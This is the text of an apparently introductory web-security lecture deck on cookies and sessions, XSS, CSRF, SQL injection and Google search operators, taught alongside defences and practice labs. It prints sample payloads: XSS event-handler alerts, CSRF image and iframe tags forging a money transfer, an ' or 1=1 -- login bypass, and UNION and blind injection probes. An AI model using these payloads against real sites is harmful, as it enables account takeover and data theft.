13. HTTP - Cookie and Session
● Cookie
○ Stored in browser
○ Browser will auto send cookie to the server .
● Session
○ Stored in server side
○ Stored in database or cache
○ Server use session to identify user.
14. HTTP - Authentication Flow Chart
1. You type username and password at login page.
2. Server check and create a session stored in database.
3. Server use HTTP header : Set-Cookie to make browser store cookie and
value is the session id .
4. When you view protected page . Browser auto send the cookie .
5. Server check the session is in the database , and know who you are.
6. Check your permission and response right page for you.
29. XSS - Introduction
● Hacker ineject script (javscript) to make browser execute.
● Normal Content
○ <p> Hi~ </p>
● Malicious Content
○ <p> <script> { script content }</script></p>
○ hacker can use javscript to steal you cookie and sensitive information .
30. XSS - XSS types
● Reflected XSS
○ Not stored in database.
○ Need user to click URL with malicious parameter.
● Stored XSS
○ Stored malicious content in database
○ take message board for example , if hacker leave a message “<script>alert()</script>,
everyone will now be alerted .
● DOM-based XSS
○ with malicious payload to modify the DOM to trigger attack.
31. XSS - How to defend
replace <script> to $lt;script$gt; ...
Use HTML Entities
32. XSS - Some useful tips
● <a href=javascript:alert(1)> xss </a>
● <button onclick=”alert(1)”> click me !</button>
● <body onload=”alert(1);”> this is body </body>
● <p onmouseover=”alert(1);”> xss </p>
● <img src=x onerror=”alert(1);” />
33. XSS - Practice
● XSS Game ( https://xss-game.appspot.com )
● bwapp
● webgoat
38. XSS - XSS Game Level 3 - Injection
1. when page load , it will called window.onload
2. window.onload => choosetab (self.location.hash.substr(1))
○ google.com#1234 => self.location.hash = “#1234”
○ “#1234”.substr(1) = “1234”
3. then replace the content with "<img src='/static/level3/cloud" + num + ".jpg' />"
4. the num is what we can control !!
5. let’s injection
6. use img’s onerror hook
43. CSRF - Introduction
1. Recall that , browser will auto send the cookie.
2. if we can inject malicious request to the website , we can fake the real user .
3. XSS can help hacker , but not neccesary.
<img src=”http://tranfer.com/?money=99999&to=hakcer>
<img src=”http://tranfer.com/confirm”>
<iframe src=”http://tranfer.com/?money=99999&to=hakcer>
44. CSRF - How to defend
● CSRF Token
○ generate special token for every request.
○ if hacker can’t steal token , then can’t fake the request.
● Origin Header
○ check the request is from the same website .
○ take last slide’s request for example , check origin header is “transfer.com”
46. SQL Injection - SQL
Structured Query Language
● SQL is used to communicate with a database.
● MySQL / MariaDB / PostgreSQL / MSSQL
● Use table to store data.
● Most used operation
○ SELECT
○ INSERT
○ UPDATE
○ DELETE
○ UNION
50. SQL Injection - Example
If we have a login page can type username and password , what will server do to
check the login is valid ?
if my username = fuyu0425 and password = 11111111 , then type it on login page.
SELECT * FROM users WHERE username = ‘fuyu0425’ and
password = ‘11111111’ ;
then check the result is not empty .
51. SQL Injection - Example (2)
Now hacker want to login my user without my password , how can he do ?
hacker can type username = fuyu0425 ‘ or 1=1 -- and password = XXXX
Now SQL statement becomes
SELECT * FROM users WHERE username = ‘fuyu0425’ or
1=1 -- ’ and password = ‘11111111’ ;
Now hacker can login without knowing my password
Because -- is used for comment in SQL ;
52. SQL Injection - Injection types
● Normal injection
○ Use UNION , useful when you know the database schema
● Blind injection
○ Ask True or False questions and determines the answer based on the application response.
● Error-based injection
● Time-based injection
53. SQL Injection - Normal injection
Use Union to query what you want
SELECT * FROM users
WHERE username = ‘fuyu0425’ or 1=1
UNION SELECT * FROM books
-- ’ and password = ‘11111111’ ;
54. SQL Injection - Blind injection
Use Boolean to determine it can be injected or not
1. http://newspaper.com/items.php?id=2
SELECT title, description, body FROM items WHERE ID = 2
1. http://newspaper.com/items.php?id=2 and 1=1
SELECT title, description, body FROM items WHERE ID = 2 and 1=1
1. http://newspaper.com/items.php?id=2 and 1=2
SELECT title, description, body FROM items WHERE ID = 2 and 1=2
If 2’s result != 3’s result based on server response , we can suspect that it can be
injected.
55. SQL Injection - Practice
● AIS3 web 3
● SQL_Demo
● bwapp (http://www.itsecgames.com/)
● webgoat
60. Google Hacking - Introduction
● Google will index website for search engine.
● Google search bar has some keyword we can use.
● keyword:
○ intile:nctu
○ inurl:google.com
○ site:google.com
○ ext:html
● Operator:
○ | : or
○ + : and
○ - : not